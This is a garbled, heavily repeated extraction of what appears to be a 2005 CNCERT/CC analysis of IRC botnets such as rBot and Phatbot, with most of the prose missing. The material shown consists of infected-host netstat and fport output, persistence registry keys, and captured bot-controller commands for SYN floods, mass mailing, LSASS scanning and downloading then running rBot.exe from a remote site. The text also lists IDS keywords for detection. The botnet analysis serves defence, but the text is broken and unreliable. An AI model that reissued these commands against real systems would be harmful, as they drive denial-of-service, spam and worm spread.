TCP 0000135 00000 LISTENING
TCP 0000445 00000 LISTENING
TCP 100011150 203151217856667 ESTABLISHED
TCP 100011616 20210832137445 FIN_WAIT_1
TCP 100011631 20210832147445 FIN_WAIT_1
TCP 100011714 20210832190445 FIN_WAIT_1
TCP 100011727 20210832165445 FIN_WAIT_1
TCP 100012253 20210834211445 TIME_WAIT
TCP 100012904 2021083791445 TIME_WAIT
TCP 100013476 20210839151445 TIME_WAIT
TCP 100013478 20210839153445 TIME_WAIT
TCP 100013480 20210839155445 TIME_WAIT
TCP 100013486 20210839151445 TIME_WAIT
TCP 100013487 20210839153445 TIME_WAIT
TCP 100013488 20210839155445 TIME_WAIT
TCP 100013673 2021084082445 TIME_WAIT
TCP 100013674 2021084082445 TIME_WAIT
TCP 100014953 2021084520445 TIME_WAIT
TCP 100014955 2021084520445 TIME_WAIT
TCP 100014959 2021084523445 TIME_WAIT
TCP 100014961 2021084523445 TIME_WAIT
UDP 000069 UDP 69
UDP 0000445
UDP 10001137
UDP 10001138
fportexe
C gtfport | find 1150 1150 6667
1048 wininit -gt 1150 TCP CWINNTsystem32wininitexe
Cgtfport | find 69
1048 wininit -gt 69 UDP CWINNTsystem32wininitexe
6667 69 wininitexe rBot
wininitexe sysinternals FileMon
bot sysinternals autoruns
rBot
HKLMSoftwareMicrosoftWindowsCurrentVersionRunMicrosoft Update 32 wininitexe
HKLMSoftwareMicrosoftWindowsCurrentVersionRunServicesMicrosoft Update 32 wininitexe
Wininit 445 6667
IP
20315121785 6667
TCP
Wininit IRC
-gtNICK CHN|9148119rnUSER autdeoxsnv 0 0 CHN|9148119rn ( )
-gtJOIN xdcc dropitrn ( xdcc dropit)
lt- CHN|9148119 autdeoxsnv 10001 332 CHN|9148119 xdcc advscan asn1smb 100 5 0 b (
advscan asn1smb )
-gtPRIVMSG xdcc [SCAN] Sequential Port Scan Started On 10000445 within a delay of 5 seconds for 0
min using 100 threadsrn( )
CNCERTCC 2005
[1]
20054
[2] Malicious Bots Hide Using Rootkit Code By Paul F Roberts May 17 2005
httpwwweweekcomarticle201759181697200asp
[3] honeynet project plusmn Kno w your ene my
Tracking Botnet
[4] Botnet Tracking Exploring a Root-Cause Methodology to Prevent Distributed Denial-of-Service Attacks
Felix C Freiling and Thorsten Holz and Georg Wicherski httpwwwhoneynetorgpapersindividual
[5] Detecting Bots in Internet Relay Chat Systems Jonas Bolliger Thomas Kaufmann
wwwtikeeethzch~ddosvaxsadasa-2004-29taskpdf
[6] Know your EnemyPhishing httpwwwhoneynetorg 16th May 2005
[7] Shield First-Line Worm Defense Helen J Wang Chuanxiong Daniel R Simon and Alf Zugenmaier
Microsoft Research ACM SIGCOMM 2004
[8] httpwwwmwcollectorg
[9] httpwwwcertorg
[10] httpwwwmessagelabcouk
[11] Joe Stewart deg E mer gi ng Threats Fr o m Discover y t o Pr ot ecti o
wwwsdissaorgdownloadsemergingthreats-publicpdf
[12] httpwwwciphertrustcomresourcesstatisticszombiephp
[13] Lurhq Threat Intelligence Group Phatbot Trojan Analysis httpwwwlurhqcomphatbothtml
[14] Lurhq Threat Intelligence Group
Sinit P2P Trojan Analysis httpwwwlurhqcomsinithtml
[15] httpwwwsymanteccompressindex_2004html
[16] Tom Vogt Simulating and optimising worm propagation algorithms
wwwsecurityfocuscomguest24046 20039
This document was created with Win2PDF available at httpwwwdaneprairiecomThe unregistered version of Win2PDF is for evaluation or non-commercial use only
IRC DCC 1987
2004 CNCERTCC
1
DDos
-gtPRIVMSG rbot syn wwwxxxcom
80 200 3600n
rbot syn syn flood 200
wwwxxxcom 80 syn 3600 -gt bot CampC S
lt-
2
(Phishing)
DNS
host pharming
ISP
redirector
[6]
Phi s h i ng
3 (Spam)
Spammer
blacklist
1
-gtPRIVMSG rbot mm httpwww recptcomfetchphp httpwwwmailnetemailhtml
mm mass mail httpwww recptcom
fetchphp php
httpwwwmailnetemailhtml
ip spammer
2 socks v4v5 Open Relay
Spammer Open Proxy Open Mail Relay
Open Relay Server Open Mail Relay Spammer
Spammer Proxy Open Relay Proxy
Open Relay Spammer Proxy Open Relay
Spammer
socks v4 Smtp Open Relay
socks v4 Open Relay
IP ISP IP
3
email AgoBot
harvestemails
4 (Spyware)
Spyware Keylogger
-gtPRIVMSG rBot Download httpwwwelitecodersnetupdateexe crBotexe 1
httpwwwelitecodersnet updateexe crBotexe 1
Windows Bot
Bot bot
PINGPONG bot
IRC TCP 6667 CNCERTCC
bot bot
cmdexe plusmnnetst at an IP
IP
135 445
fportexe netstat
11
bot
CD-Key
bot
bot ie
ie bot rootkit [2]
bot rootkit
rootkit bot
CNCERTCC
1 honeypot bot
2) IDS
3
IRC
1 Honeypot
bot bot Honeywall
bot dnsip
windows 25 [11]
bot bot
[3] honeynet project 2004 11
2005 3 1 HoneyWall 1 mwcollect[8]
180
30 5500 800 2004
11 2005 1 406 Ddos 179 [4]
2
IRC IDS IRC Bot JOIN PASS
PRIVMSG NICK TOPIC NOTICE
IRC TCP
udp syn ddos http download exe update scan exploit login
logon advscan lsass dcom beagle dameware
3
1 bot(fast joining bots)
bots IRC
IRC
2) bot(Long standing connection)
bots
3) bot(not talkative)
Bots bot pingpong
DdoSVax [5] Bot
4
1
IDS bot
bot bot
bot bot
IDS IRC
2
IDS IRC
Bot IRC IRC RFC IDS
bot
IRC IRC
3
IDS
bot
IDS
socks v4
Server plusmnTOPI rBot advscan lsass 200 5 0 -r s
a
-gtTOPIC rBot advscan lsass 200 5 0 -r sn
b
-gtTOPIC rBot advscan lsass 200 5 0 -r sn
c) Botnet bot
lt-ControllerNICKControllerUSERsocks(HOST or IP) TOPIC rBot advscan lsass
200 5 0 -r srn
IDS bot
IP IP IP IP
IDS 3 1 3
1 3 1
1 IDS
IRC
1
IP port ( )
2
channel ( )
3 Host
login pass
host bot
4 Bot
login update download uninstall
Botnet
1
bot
1
bot
bot
bot
2
bot
bot bot
bot
2
IP
bot
3 bot
2005 CNCERTCC
Bot
1 IRC
IRC bot
bot bot
IRC
Serv1 Serv2 shy Ser v N
IRC Serv1 Serv1 IP Serv2
Serv3 Serv2 Nick_Serv1
Serv2 Serv1 IRC ServX Nick_Serv3
Nick_Serv6 Serv3 Serv6 ServX
2 TOPIC
TOPIC IRC
bot TOPIC
TOPIC 1)advscan lsass 200 5 0 -r s
LSASS 200 5 -r = random
-s = silent
2)httpupdate httpserverrBotexe crBotexe 1
server rBotexe c 1
CNCERTCC TOPIC Bot
TOPIC degJ OI N ne wchanne
TOPIC PRIVMSG
bot bot bot TOPIC
TOPIC IP IP
IP
3
bot
bot
Bot
login logon auth
bot bot nick
host rBot v065
1
-gtPRIVMSG rbot login password sn
IP
2 bot
lt-ControllerNICKControllerUSERhost PRIVMSG rbot login password -srn
1 2
IP Bot
host
IP
lt-ControllerNICKControllerUSER10101010 PRIVMSG rbot login password -srn
10101010 login
3 rBot NICK
ControllerNICK USER(ControllerUSER) host (login) (password
-s) rBot
user host rBot
host net com net
com rBot host com net
()
4 -s silent bot
-gtPRIVMSG rbot password acceptedn
bot
Windows Windows
bot 90
[7]
Windows XP
11
Bot
Symantec 2004 1 6 Bot
2000 30000 [15] MessageLabs 2004
70 [10] CipherTrust 2005 4 5
15 17 20-15
Bot [12]
IRC Agobot
PhatBot P2P
IRC P2P
2005 rootkit bot(rBot )
rootkit bot bot
2004
CNCERTCC Bot
IRC
P2P P2P bot
Phatbot[13] sinit[14]
Phatbot Gnutella Guutella cache servers server peer
peer TCP 4387 Gnutella Phatbot
waste waste Phatbot waste
md5
Phatbot
sinit P2P Peer
dll dll sinit
bot
CNCERTCC bot
httpgoa-irccoukwostenrbotexe 2005 7 9 9 rbotexe
IP 10001
sniffer
cmdexe
cgtnetstat anrn
TCP 0000135 00000 LISTENING
TCP 0000445 00000 LISTENING
TCP 100011150 203151217856667 ESTABLISHED
TCP 100011616 20210832137445 FIN_WAIT_1
TCP 100011631 20210832147445 FIN_WAIT_1
TCP 100011714 20210832190445 FIN_WAIT_1
TCP 100011727 20210832165445 FIN_WAIT_1
TCP 100012253 20210834211445 TIME_WAIT
TCP 100012904 2021083791445 TIME_WAIT
TCP 100013476 20210839151445 TIME_WAIT
TCP 100013478 20210839153445 TIME_WAIT
TCP 100013480 20210839155445 TIME_WAIT
TCP 100013486 20210839151445 TIME_WAIT
TCP 100013487 20210839153445 TIME_WAIT
TCP 100013488 20210839155445 TIME_WAIT
TCP 100013673 2021084082445 TIME_WAIT
TCP 100013674 2021084082445 TIME_WAIT
TCP 100014953 2021084520445 TIME_WAIT
TCP 100014955 2021084520445 TIME_WAIT
TCP 100014959 2021084523445 TIME_WAIT
TCP 100014961 2021084523445 TIME_WAIT
UDP 000069 UDP 69
UDP 0000445
UDP 10001137
UDP 10001138
fportexe
C gtfport | find 1150 1150 6667
1048 wininit -gt 1150 TCP CWINNTsystem32wininitexe
Cgtfport | find 69
1048 wininit -gt 69 UDP CWINNTsystem32wininitexe
6667 69 wininitexe rBot
wininitexe sysinternals FileMon
bot sysinternals autoruns
rBot
HKLMSoftwareMicrosoftWindowsCurrentVersionRunMicrosoft Update 32 wininitexe
HKLMSoftwareMicrosoftWindowsCurrentVersionRunServicesMicrosoft Update 32 wininitexe
Wininit 445 6667
IP
20315121785 6667
TCP
Wininit IRC
-gtNICK CHN|9148119rnUSER autdeoxsnv 0 0 CHN|9148119rn ( )
-gtJOIN xdcc dropitrn ( xdcc dropit)
lt- CHN|9148119 autdeoxsnv 10001 332 CHN|9148119 xdcc advscan asn1smb 100 5 0 b (
advscan asn1smb )
-gtPRIVMSG xdcc [SCAN] Sequential Port Scan Started On 10000445 within a delay of 5 seconds for 0
min using 100 threadsrn( )
CNCERTCC 2005
[1]
20054
[2] Malicious Bots Hide Using Rootkit Code By Paul F Roberts May 17 2005
httpwwweweekcomarticle201759181697200asp
[3] honeynet project plusmn Kno w your ene my
Tracking Botnet
[4] Botnet Tracking Exploring a Root-Cause Methodology to Prevent Distributed Denial-of-Service Attacks
Felix C Freiling and Thorsten Holz and Georg Wicherski httpwwwhoneynetorgpapersindividual
[5] Detecting Bots in Internet Relay Chat Systems Jonas Bolliger Thomas Kaufmann
wwwtikeeethzch~ddosvaxsadasa-2004-29taskpdf
[6] Know your EnemyPhishing httpwwwhoneynetorg 16th May 2005
[7] Shield First-Line Worm Defense Helen J Wang Chuanxiong Daniel R Simon and Alf Zugenmaier
Microsoft Research ACM SIGCOMM 2004
[8] httpwwwmwcollectorg
[9] httpwwwcertorg
[10] httpwwwmessagelabcouk
[11] Joe Stewart deg E mer gi ng Threats Fr o m Discover y t o Pr ot ecti o
wwwsdissaorgdownloadsemergingthreats-publicpdf
[12] httpwwwciphertrustcomresourcesstatisticszombiephp
[13] Lurhq Threat Intelligence Group Phatbot Trojan Analysis httpwwwlurhqcomphatbothtml
[14] Lurhq Threat Intelligence Group
Sinit P2P Trojan Analysis httpwwwlurhqcomsinithtml
[15] httpwwwsymanteccompressindex_2004html
[16] Tom Vogt Simulating and optimising worm propagation algorithms
wwwsecurityfocuscomguest24046 20039
This document was created with Win2PDF available at httpwwwdaneprairiecomThe unregistered version of Win2PDF is for evaluation or non-commercial use only
Phi s h i ng
3 (Spam)
Spammer
blacklist
1
-gtPRIVMSG rbot mm httpwww recptcomfetchphp httpwwwmailnetemailhtml
mm mass mail httpwww recptcom
fetchphp php
httpwwwmailnetemailhtml
ip spammer
2 socks v4v5 Open Relay
Spammer Open Proxy Open Mail Relay
Open Relay Server Open Mail Relay Spammer
Spammer Proxy Open Relay Proxy
Open Relay Spammer Proxy Open Relay
Spammer
socks v4 Smtp Open Relay
socks v4 Open Relay
IP ISP IP
3
email AgoBot
harvestemails
4 (Spyware)
Spyware Keylogger
-gtPRIVMSG rBot Download httpwwwelitecodersnetupdateexe crBotexe 1
httpwwwelitecodersnet updateexe crBotexe 1
Windows Bot
Bot bot
PINGPONG bot
IRC TCP 6667 CNCERTCC
bot bot
cmdexe plusmnnetst at an IP
IP
135 445
fportexe netstat
11
bot
CD-Key
bot
bot ie
ie bot rootkit [2]
bot rootkit
rootkit bot
CNCERTCC
1 honeypot bot
2) IDS
3
IRC
1 Honeypot
bot bot Honeywall
bot dnsip
windows 25 [11]
bot bot
[3] honeynet project 2004 11
2005 3 1 HoneyWall 1 mwcollect[8]
180
30 5500 800 2004
11 2005 1 406 Ddos 179 [4]
2
IRC IDS IRC Bot JOIN PASS
PRIVMSG NICK TOPIC NOTICE
IRC TCP
udp syn ddos http download exe update scan exploit login
logon advscan lsass dcom beagle dameware
3
1 bot(fast joining bots)
bots IRC
IRC
2) bot(Long standing connection)
bots
3) bot(not talkative)
Bots bot pingpong
DdoSVax [5] Bot
4
1
IDS bot
bot bot
bot bot
IDS IRC
2
IDS IRC
Bot IRC IRC RFC IDS
bot
IRC IRC
3
IDS
bot
IDS
socks v4
Server plusmnTOPI rBot advscan lsass 200 5 0 -r s
a
-gtTOPIC rBot advscan lsass 200 5 0 -r sn
b
-gtTOPIC rBot advscan lsass 200 5 0 -r sn
c) Botnet bot
lt-ControllerNICKControllerUSERsocks(HOST or IP) TOPIC rBot advscan lsass
200 5 0 -r srn
IDS bot
IP IP IP IP
IDS 3 1 3
1 3 1
1 IDS
IRC
1
IP port ( )
2
channel ( )
3 Host
login pass
host bot
4 Bot
login update download uninstall
Botnet
1
bot
1
bot
bot
bot
2
bot
bot bot
bot
2
IP
bot
3 bot
2005 CNCERTCC
Bot
1 IRC
IRC bot
bot bot
IRC
Serv1 Serv2 shy Ser v N
IRC Serv1 Serv1 IP Serv2
Serv3 Serv2 Nick_Serv1
Serv2 Serv1 IRC ServX Nick_Serv3
Nick_Serv6 Serv3 Serv6 ServX
2 TOPIC
TOPIC IRC
bot TOPIC
TOPIC 1)advscan lsass 200 5 0 -r s
LSASS 200 5 -r = random
-s = silent
2)httpupdate httpserverrBotexe crBotexe 1
server rBotexe c 1
CNCERTCC TOPIC Bot
TOPIC degJ OI N ne wchanne
TOPIC PRIVMSG
bot bot bot TOPIC
TOPIC IP IP
IP
3
bot
bot
Bot
login logon auth
bot bot nick
host rBot v065
1
-gtPRIVMSG rbot login password sn
IP
2 bot
lt-ControllerNICKControllerUSERhost PRIVMSG rbot login password -srn
1 2
IP Bot
host
IP
lt-ControllerNICKControllerUSER10101010 PRIVMSG rbot login password -srn
10101010 login
3 rBot NICK
ControllerNICK USER(ControllerUSER) host (login) (password
-s) rBot
user host rBot
host net com net
com rBot host com net
()
4 -s silent bot
-gtPRIVMSG rbot password acceptedn
bot
Windows Windows
bot 90
[7]
Windows XP
11
Bot
Symantec 2004 1 6 Bot
2000 30000 [15] MessageLabs 2004
70 [10] CipherTrust 2005 4 5
15 17 20-15
Bot [12]
IRC Agobot
PhatBot P2P
IRC P2P
2005 rootkit bot(rBot )
rootkit bot bot
2004
CNCERTCC Bot
IRC
P2P P2P bot
Phatbot[13] sinit[14]
Phatbot Gnutella Guutella cache servers server peer
peer TCP 4387 Gnutella Phatbot
waste waste Phatbot waste
md5
Phatbot
sinit P2P Peer
dll dll sinit
bot
CNCERTCC bot
httpgoa-irccoukwostenrbotexe 2005 7 9 9 rbotexe
IP 10001
sniffer
cmdexe
cgtnetstat anrn
TCP 0000135 00000 LISTENING
TCP 0000445 00000 LISTENING
TCP 100011150 203151217856667 ESTABLISHED
TCP 100011616 20210832137445 FIN_WAIT_1
TCP 100011631 20210832147445 FIN_WAIT_1
TCP 100011714 20210832190445 FIN_WAIT_1
TCP 100011727 20210832165445 FIN_WAIT_1
TCP 100012253 20210834211445 TIME_WAIT
TCP 100012904 2021083791445 TIME_WAIT
TCP 100013476 20210839151445 TIME_WAIT
TCP 100013478 20210839153445 TIME_WAIT
TCP 100013480 20210839155445 TIME_WAIT
TCP 100013486 20210839151445 TIME_WAIT
TCP 100013487 20210839153445 TIME_WAIT
TCP 100013488 20210839155445 TIME_WAIT
TCP 100013673 2021084082445 TIME_WAIT
TCP 100013674 2021084082445 TIME_WAIT
TCP 100014953 2021084520445 TIME_WAIT
TCP 100014955 2021084520445 TIME_WAIT
TCP 100014959 2021084523445 TIME_WAIT
TCP 100014961 2021084523445 TIME_WAIT
UDP 000069 UDP 69
UDP 0000445
UDP 10001137
UDP 10001138
fportexe
C gtfport | find 1150 1150 6667
1048 wininit -gt 1150 TCP CWINNTsystem32wininitexe
Cgtfport | find 69
1048 wininit -gt 69 UDP CWINNTsystem32wininitexe
6667 69 wininitexe rBot
wininitexe sysinternals FileMon
bot sysinternals autoruns
rBot
HKLMSoftwareMicrosoftWindowsCurrentVersionRunMicrosoft Update 32 wininitexe
HKLMSoftwareMicrosoftWindowsCurrentVersionRunServicesMicrosoft Update 32 wininitexe
Wininit 445 6667
IP
20315121785 6667
TCP
Wininit IRC
-gtNICK CHN|9148119rnUSER autdeoxsnv 0 0 CHN|9148119rn ( )
-gtJOIN xdcc dropitrn ( xdcc dropit)
lt- CHN|9148119 autdeoxsnv 10001 332 CHN|9148119 xdcc advscan asn1smb 100 5 0 b (
advscan asn1smb )
-gtPRIVMSG xdcc [SCAN] Sequential Port Scan Started On 10000445 within a delay of 5 seconds for 0
min using 100 threadsrn( )
CNCERTCC 2005
[1]
20054
[2] Malicious Bots Hide Using Rootkit Code By Paul F Roberts May 17 2005
httpwwweweekcomarticle201759181697200asp
[3] honeynet project plusmn Kno w your ene my
Tracking Botnet
[4] Botnet Tracking Exploring a Root-Cause Methodology to Prevent Distributed Denial-of-Service Attacks
Felix C Freiling and Thorsten Holz and Georg Wicherski httpwwwhoneynetorgpapersindividual
[5] Detecting Bots in Internet Relay Chat Systems Jonas Bolliger Thomas Kaufmann
wwwtikeeethzch~ddosvaxsadasa-2004-29taskpdf
[6] Know your EnemyPhishing httpwwwhoneynetorg 16th May 2005
[7] Shield First-Line Worm Defense Helen J Wang Chuanxiong Daniel R Simon and Alf Zugenmaier
Microsoft Research ACM SIGCOMM 2004
[8] httpwwwmwcollectorg
[9] httpwwwcertorg
[10] httpwwwmessagelabcouk
[11] Joe Stewart deg E mer gi ng Threats Fr o m Discover y t o Pr ot ecti o
wwwsdissaorgdownloadsemergingthreats-publicpdf
[12] httpwwwciphertrustcomresourcesstatisticszombiephp
[13] Lurhq Threat Intelligence Group Phatbot Trojan Analysis httpwwwlurhqcomphatbothtml
[14] Lurhq Threat Intelligence Group
Sinit P2P Trojan Analysis httpwwwlurhqcomsinithtml
[15] httpwwwsymanteccompressindex_2004html
[16] Tom Vogt Simulating and optimising worm propagation algorithms
wwwsecurityfocuscomguest24046 20039
This document was created with Win2PDF available at httpwwwdaneprairiecomThe unregistered version of Win2PDF is for evaluation or non-commercial use only
socks v4 Smtp Open Relay
socks v4 Open Relay
IP ISP IP
3
email AgoBot
harvestemails
4 (Spyware)
Spyware Keylogger
-gtPRIVMSG rBot Download httpwwwelitecodersnetupdateexe crBotexe 1
httpwwwelitecodersnet updateexe crBotexe 1
Windows Bot
Bot bot
PINGPONG bot
IRC TCP 6667 CNCERTCC
bot bot
cmdexe plusmnnetst at an IP
IP
135 445
fportexe netstat
11
bot
CD-Key
bot
bot ie
ie bot rootkit [2]
bot rootkit
rootkit bot
CNCERTCC
1 honeypot bot
2) IDS
3
IRC
1 Honeypot
bot bot Honeywall
bot dnsip
windows 25 [11]
bot bot
[3] honeynet project 2004 11
2005 3 1 HoneyWall 1 mwcollect[8]
180
30 5500 800 2004
11 2005 1 406 Ddos 179 [4]
2
IRC IDS IRC Bot JOIN PASS
PRIVMSG NICK TOPIC NOTICE
IRC TCP
udp syn ddos http download exe update scan exploit login
logon advscan lsass dcom beagle dameware
3
1 bot(fast joining bots)
bots IRC
IRC
2) bot(Long standing connection)
bots
3) bot(not talkative)
Bots bot pingpong
DdoSVax [5] Bot
4
1
IDS bot
bot bot
bot bot
IDS IRC
2
IDS IRC
Bot IRC IRC RFC IDS
bot
IRC IRC
3
IDS
bot
IDS
socks v4
Server plusmnTOPI rBot advscan lsass 200 5 0 -r s
a
-gtTOPIC rBot advscan lsass 200 5 0 -r sn
b
-gtTOPIC rBot advscan lsass 200 5 0 -r sn
c) Botnet bot
lt-ControllerNICKControllerUSERsocks(HOST or IP) TOPIC rBot advscan lsass
200 5 0 -r srn
IDS bot
IP IP IP IP
IDS 3 1 3
1 3 1
1 IDS
IRC
1
IP port ( )
2
channel ( )
3 Host
login pass
host bot
4 Bot
login update download uninstall
Botnet
1
bot
1
bot
bot
bot
2
bot
bot bot
bot
2
IP
bot
3 bot
2005 CNCERTCC
Bot
1 IRC
IRC bot
bot bot
IRC
Serv1 Serv2 shy Ser v N
IRC Serv1 Serv1 IP Serv2
Serv3 Serv2 Nick_Serv1
Serv2 Serv1 IRC ServX Nick_Serv3
Nick_Serv6 Serv3 Serv6 ServX
2 TOPIC
TOPIC IRC
bot TOPIC
TOPIC 1)advscan lsass 200 5 0 -r s
LSASS 200 5 -r = random
-s = silent
2)httpupdate httpserverrBotexe crBotexe 1
server rBotexe c 1
CNCERTCC TOPIC Bot
TOPIC degJ OI N ne wchanne
TOPIC PRIVMSG
bot bot bot TOPIC
TOPIC IP IP
IP
3
bot
bot
Bot
login logon auth
bot bot nick
host rBot v065
1
-gtPRIVMSG rbot login password sn
IP
2 bot
lt-ControllerNICKControllerUSERhost PRIVMSG rbot login password -srn
1 2
IP Bot
host
IP
lt-ControllerNICKControllerUSER10101010 PRIVMSG rbot login password -srn
10101010 login
3 rBot NICK
ControllerNICK USER(ControllerUSER) host (login) (password
-s) rBot
user host rBot
host net com net
com rBot host com net
()
4 -s silent bot
-gtPRIVMSG rbot password acceptedn
bot
Windows Windows
bot 90
[7]
Windows XP
11
Bot
Symantec 2004 1 6 Bot
2000 30000 [15] MessageLabs 2004
70 [10] CipherTrust 2005 4 5
15 17 20-15
Bot [12]
IRC Agobot
PhatBot P2P
IRC P2P
2005 rootkit bot(rBot )
rootkit bot bot
2004
CNCERTCC Bot
IRC
P2P P2P bot
Phatbot[13] sinit[14]
Phatbot Gnutella Guutella cache servers server peer
peer TCP 4387 Gnutella Phatbot
waste waste Phatbot waste
md5
Phatbot
sinit P2P Peer
dll dll sinit
bot
CNCERTCC bot
httpgoa-irccoukwostenrbotexe 2005 7 9 9 rbotexe
IP 10001
sniffer
cmdexe
cgtnetstat anrn
TCP 0000135 00000 LISTENING
TCP 0000445 00000 LISTENING
TCP 100011150 203151217856667 ESTABLISHED
TCP 100011616 20210832137445 FIN_WAIT_1
TCP 100011631 20210832147445 FIN_WAIT_1
TCP 100011714 20210832190445 FIN_WAIT_1
TCP 100011727 20210832165445 FIN_WAIT_1
TCP 100012253 20210834211445 TIME_WAIT
TCP 100012904 2021083791445 TIME_WAIT
TCP 100013476 20210839151445 TIME_WAIT
TCP 100013478 20210839153445 TIME_WAIT
TCP 100013480 20210839155445 TIME_WAIT
TCP 100013486 20210839151445 TIME_WAIT
TCP 100013487 20210839153445 TIME_WAIT
TCP 100013488 20210839155445 TIME_WAIT
TCP 100013673 2021084082445 TIME_WAIT
TCP 100013674 2021084082445 TIME_WAIT
TCP 100014953 2021084520445 TIME_WAIT
TCP 100014955 2021084520445 TIME_WAIT
TCP 100014959 2021084523445 TIME_WAIT
TCP 100014961 2021084523445 TIME_WAIT
UDP 000069 UDP 69
UDP 0000445
UDP 10001137
UDP 10001138
fportexe
C gtfport | find 1150 1150 6667
1048 wininit -gt 1150 TCP CWINNTsystem32wininitexe
Cgtfport | find 69
1048 wininit -gt 69 UDP CWINNTsystem32wininitexe
6667 69 wininitexe rBot
wininitexe sysinternals FileMon
bot sysinternals autoruns
rBot
HKLMSoftwareMicrosoftWindowsCurrentVersionRunMicrosoft Update 32 wininitexe
HKLMSoftwareMicrosoftWindowsCurrentVersionRunServicesMicrosoft Update 32 wininitexe
Wininit 445 6667
IP
20315121785 6667
TCP
Wininit IRC
-gtNICK CHN|9148119rnUSER autdeoxsnv 0 0 CHN|9148119rn ( )
-gtJOIN xdcc dropitrn ( xdcc dropit)
lt- CHN|9148119 autdeoxsnv 10001 332 CHN|9148119 xdcc advscan asn1smb 100 5 0 b (
advscan asn1smb )
-gtPRIVMSG xdcc [SCAN] Sequential Port Scan Started On 10000445 within a delay of 5 seconds for 0
min using 100 threadsrn( )
CNCERTCC 2005
[1]
20054
[2] Malicious Bots Hide Using Rootkit Code By Paul F Roberts May 17 2005
httpwwweweekcomarticle201759181697200asp
[3] honeynet project plusmn Kno w your ene my
Tracking Botnet
[4] Botnet Tracking Exploring a Root-Cause Methodology to Prevent Distributed Denial-of-Service Attacks
Felix C Freiling and Thorsten Holz and Georg Wicherski httpwwwhoneynetorgpapersindividual
[5] Detecting Bots in Internet Relay Chat Systems Jonas Bolliger Thomas Kaufmann
wwwtikeeethzch~ddosvaxsadasa-2004-29taskpdf
[6] Know your EnemyPhishing httpwwwhoneynetorg 16th May 2005
[7] Shield First-Line Worm Defense Helen J Wang Chuanxiong Daniel R Simon and Alf Zugenmaier
Microsoft Research ACM SIGCOMM 2004
[8] httpwwwmwcollectorg
[9] httpwwwcertorg
[10] httpwwwmessagelabcouk
[11] Joe Stewart deg E mer gi ng Threats Fr o m Discover y t o Pr ot ecti o
wwwsdissaorgdownloadsemergingthreats-publicpdf
[12] httpwwwciphertrustcomresourcesstatisticszombiephp
[13] Lurhq Threat Intelligence Group Phatbot Trojan Analysis httpwwwlurhqcomphatbothtml
[14] Lurhq Threat Intelligence Group
Sinit P2P Trojan Analysis httpwwwlurhqcomsinithtml
[15] httpwwwsymanteccompressindex_2004html
[16] Tom Vogt Simulating and optimising worm propagation algorithms
wwwsecurityfocuscomguest24046 20039
This document was created with Win2PDF available at httpwwwdaneprairiecomThe unregistered version of Win2PDF is for evaluation or non-commercial use only
bot ie
ie bot rootkit [2]
bot rootkit
rootkit bot
CNCERTCC
1 honeypot bot
2) IDS
3
IRC
1 Honeypot
bot bot Honeywall
bot dnsip
windows 25 [11]
bot bot
[3] honeynet project 2004 11
2005 3 1 HoneyWall 1 mwcollect[8]
180
30 5500 800 2004
11 2005 1 406 Ddos 179 [4]
2
IRC IDS IRC Bot JOIN PASS
PRIVMSG NICK TOPIC NOTICE
IRC TCP
udp syn ddos http download exe update scan exploit login
logon advscan lsass dcom beagle dameware
3
1 bot(fast joining bots)
bots IRC
IRC
2) bot(Long standing connection)
bots
3) bot(not talkative)
Bots bot pingpong
DdoSVax [5] Bot
4
1
IDS bot
bot bot
bot bot
IDS IRC
2
IDS IRC
Bot IRC IRC RFC IDS
bot
IRC IRC
3
IDS
bot
IDS
socks v4
Server plusmnTOPI rBot advscan lsass 200 5 0 -r s
a
-gtTOPIC rBot advscan lsass 200 5 0 -r sn
b
-gtTOPIC rBot advscan lsass 200 5 0 -r sn
c) Botnet bot
lt-ControllerNICKControllerUSERsocks(HOST or IP) TOPIC rBot advscan lsass
200 5 0 -r srn
IDS bot
IP IP IP IP
IDS 3 1 3
1 3 1
1 IDS
IRC
1
IP port ( )
2
channel ( )
3 Host
login pass
host bot
4 Bot
login update download uninstall
Botnet
1
bot
1
bot
bot
bot
2
bot
bot bot
bot
2
IP
bot
3 bot
2005 CNCERTCC
Bot
1 IRC
IRC bot
bot bot
IRC
Serv1 Serv2 shy Ser v N
IRC Serv1 Serv1 IP Serv2
Serv3 Serv2 Nick_Serv1
Serv2 Serv1 IRC ServX Nick_Serv3
Nick_Serv6 Serv3 Serv6 ServX
2 TOPIC
TOPIC IRC
bot TOPIC
TOPIC 1)advscan lsass 200 5 0 -r s
LSASS 200 5 -r = random
-s = silent
2)httpupdate httpserverrBotexe crBotexe 1
server rBotexe c 1
CNCERTCC TOPIC Bot
TOPIC degJ OI N ne wchanne
TOPIC PRIVMSG
bot bot bot TOPIC
TOPIC IP IP
IP
3
bot
bot
Bot
login logon auth
bot bot nick
host rBot v065
1
-gtPRIVMSG rbot login password sn
IP
2 bot
lt-ControllerNICKControllerUSERhost PRIVMSG rbot login password -srn
1 2
IP Bot
host
IP
lt-ControllerNICKControllerUSER10101010 PRIVMSG rbot login password -srn
10101010 login
3 rBot NICK
ControllerNICK USER(ControllerUSER) host (login) (password
-s) rBot
user host rBot
host net com net
com rBot host com net
()
4 -s silent bot
-gtPRIVMSG rbot password acceptedn
bot
Windows Windows
bot 90
[7]
Windows XP
11
Bot
Symantec 2004 1 6 Bot
2000 30000 [15] MessageLabs 2004
70 [10] CipherTrust 2005 4 5
15 17 20-15
Bot [12]
IRC Agobot
PhatBot P2P
IRC P2P
2005 rootkit bot(rBot )
rootkit bot bot
2004
CNCERTCC Bot
IRC
P2P P2P bot
Phatbot[13] sinit[14]
Phatbot Gnutella Guutella cache servers server peer
peer TCP 4387 Gnutella Phatbot
waste waste Phatbot waste
md5
Phatbot
sinit P2P Peer
dll dll sinit
bot
CNCERTCC bot
httpgoa-irccoukwostenrbotexe 2005 7 9 9 rbotexe
IP 10001
sniffer
cmdexe
cgtnetstat anrn
TCP 0000135 00000 LISTENING
TCP 0000445 00000 LISTENING
TCP 100011150 203151217856667 ESTABLISHED
TCP 100011616 20210832137445 FIN_WAIT_1
TCP 100011631 20210832147445 FIN_WAIT_1
TCP 100011714 20210832190445 FIN_WAIT_1
TCP 100011727 20210832165445 FIN_WAIT_1
TCP 100012253 20210834211445 TIME_WAIT
TCP 100012904 2021083791445 TIME_WAIT
TCP 100013476 20210839151445 TIME_WAIT
TCP 100013478 20210839153445 TIME_WAIT
TCP 100013480 20210839155445 TIME_WAIT
TCP 100013486 20210839151445 TIME_WAIT
TCP 100013487 20210839153445 TIME_WAIT
TCP 100013488 20210839155445 TIME_WAIT
TCP 100013673 2021084082445 TIME_WAIT
TCP 100013674 2021084082445 TIME_WAIT
TCP 100014953 2021084520445 TIME_WAIT
TCP 100014955 2021084520445 TIME_WAIT
